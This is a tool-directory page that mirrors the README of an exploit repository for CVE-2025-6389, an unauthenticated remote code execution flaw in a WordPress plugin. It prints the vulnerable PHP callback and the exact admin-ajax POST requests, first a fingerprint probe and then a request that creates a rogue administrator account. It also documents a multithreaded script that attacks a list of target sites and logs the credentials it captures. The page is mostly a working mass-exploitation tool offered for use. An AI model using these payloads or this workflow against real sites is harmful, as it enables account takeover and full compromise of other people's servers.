Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback

View Repository
115 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-6389

Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback

    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python License


📡 Don't miss the next drop. Follow @KNxploited on Telegram — the definitive channel for freshly disclosed CVEs, working exploits, and elite security research. First to know. First to act.


🧠 Overview

CVE-2025-6389 is a CVSS 9.8 Critical Remote Code Execution vulnerability found in the Sneeit Framework plugin for WordPress.

The flaw exists in the sneeit_articles_pagination_callback() function, which blindly passes user-supplied input into PHP's call_user_func() — an unauthenticated attacker can call any PHP function with arbitrary arguments, including wp_insert_user, effectively granting themselves full administrator access or executing any server-side code.

FieldDetails
CVE IDCVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Affected VersionsAll versions up to and including 8.3
Vulnerability TypeRemote Code Execution (RCE)
Attack VectorNetwork — No Authentication Required
CVSS 3.1 Score9.8 CRITICAL
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactFull server compromise / Admin takeover
ResearcherNxploited

💀 Vulnerability Deep Dive

The root cause is misuse of PHP's call_user_func() in the plugin's AJAX handler:

// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Why this is critical:

  • wp_ajax_nopriv_* = accessible by anyone, no login required
  • call_user_func($callback, $args) = arbitrary function invocation
  • Attacker can call var_dump, system, wp_insert_user, eval, or any PHP/WordPress function
  • The response is returned directly — enabling blind & verbose RCE

⚔️ Exploit Chain

Step 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
  ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Result → New administrator account silently created on target
  ↓
Full WordPress admin panel access achieved ✔️

⚙️ Requirements

pip install requests rich
DependencyPurpose
requestsHTTP requests with session/proxy support
richLive terminal dashboard, panels, progress
threadingConcurrent multi-target processing
queueThread-safe target distribution

Python 3.8+ required. Type hints use tuple[...] syntax introduced in 3.9+ — use 3.9+ for best compatibility.


📂 File Structure

CVE-2025-6389/
├── CVE-2025-6389.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: successful targets + credentials
└── debug_responses/          # Auto-generated: raw server responses for debugging
    └── <target>.resp.txt

🚀 Usage

Step 1 — Prepare Targets

Create list.txt with one URL per line:

https://target1.com
https://target2.com
http://target3.com

URLs without http:// or https:// are automatically prefixed with http://.


Step 2 — Run the Exploit

python CVE-2025-6389.py

You will be prompted:

Targets file name (default list.txt): list.txt
Number of threads (default 10):       20

Step 3 — Live Dashboard

The script launches a real-time Rich dashboard showing:

┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

Step 4 — Review Results

Successful exploits are saved to success_results.txt:

https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

Debug responses (for failed targets) are saved under debug_responses/:

debug_responses/
└── https___victim.com.resp.txt   ← Raw server response for analysis

🖥️ Script Parameters Reference

Download Tool